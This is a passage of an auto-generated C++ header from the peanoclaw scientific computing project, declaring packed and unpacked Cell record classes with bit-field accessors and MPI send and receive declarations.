getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ CellPacked convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifndef DaStGenPackedPadding #define DaStGenPackedPadding 1 // 32 bit version // #define DaStGenPackedPadding 2 // 64 bit version #endif #ifdef PackedRecords #pragma pack (push, DaStGenPackedPadding) #endif /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::CellPacked { public: typedef peanoclaw::records::Cell::State State; struct PersistentRecords { int _cellDescriptionIndex; tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; int _responsibleRank; bool _subtreeHoldsWorker; double _nodeWorkload; double _localWorkload; double _totalWorkload; double _maxWorkload; double _minWorkload; int _numberOfLoadsFromInputStream; int _numberOfStoresToOutputStream; /** mapping of records: || Member || startbit || length | isInside | startbit 0 | #bits 1 | state | startbit 1 | #bits 2 | evenFlags | startbit 3 | #bits DIMENSIONS | cellIsAForkCandidate | startbit DIMENSIONS + 3 | #bits 1 */ short int _packedRecords0; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _packedRecords0 = static_cast<short int>( isInside ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | state << (1)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | evenFlags.to_ulong() << (3)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); _packedRecords0 = static_cast<short int>( cellIsAForkCandidate ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfStoresToOutputStream = numberOfStoresToOutputStream; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ CellPacked(); /** * Generated */ CellPacked(const PersistentRecords& persistentRecords); /** * Generated */ CellPacked(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); /** * Generated */ virtual ~CellPacked(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _persistentRecords._packedRecords0 = static_cast<short int>( isInside ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | state << (1)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | evenFlags.to_ulong() << (3)); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; return (_persistentRecords._packedRecords0& mask); } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); assertion(!evenFlags || evenFlags==1); int shift = 3 + elementIndex; int mask = 1 << (shift); int shiftedValue = evenFlags << (shift); _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 & ~mask; _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 | shiftedValue; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; _persistentRecords._packedRecords0^= mask; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); _persistentRecords._packedRecords0 = static_cast<short int>( cellIsAForkCandidate ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfStoresToOutputStream = numberOfStoresToOutputStream; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ Cell convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifdef PackedRecords #pragma pack (pop) #endif #elif !defined(Parallel) && defined(SharedMemoryParallelisation) && defined(Debug) /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::Cell { public: typedef peanoclaw::records::CellPacked Packed; enum State { Leaf = 0, Refined = 1, Root = 2 }; struct PersistentRecords { int _cellDescriptionIndex; bool _isInside; State _state; int _level; #ifdef UseManualAlignment std::bitset<DIMENSIONS> _evenFlags __attribute__((aligned(VectorisationAlignment))); #else std::bitset<DIMENSIONS> _evenFlags; #endif #ifdef UseManualAlignment tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber __attribute__((aligned(VectorisationAlignment))); #else tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; #endif int _numberOfLoadsFromInputStream; int _numberOfStoresToOutputStream; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _state = state; } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _evenFlags = (evenFlags); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfStoresToOutputStream = numberOfStoresToOutputStream; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ Cell(); /** * Generated */ Cell(const PersistentRecords& persistentRecords); /** * Generated */ Cell(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); /** * Generated */ virtual ~Cell(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._state = state; } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._evenFlags = (evenFlags); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); return _persistentRecords._evenFlags[elementIndex]; } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags[elementIndex]= evenFlags; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags.flip(elementIndex); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const 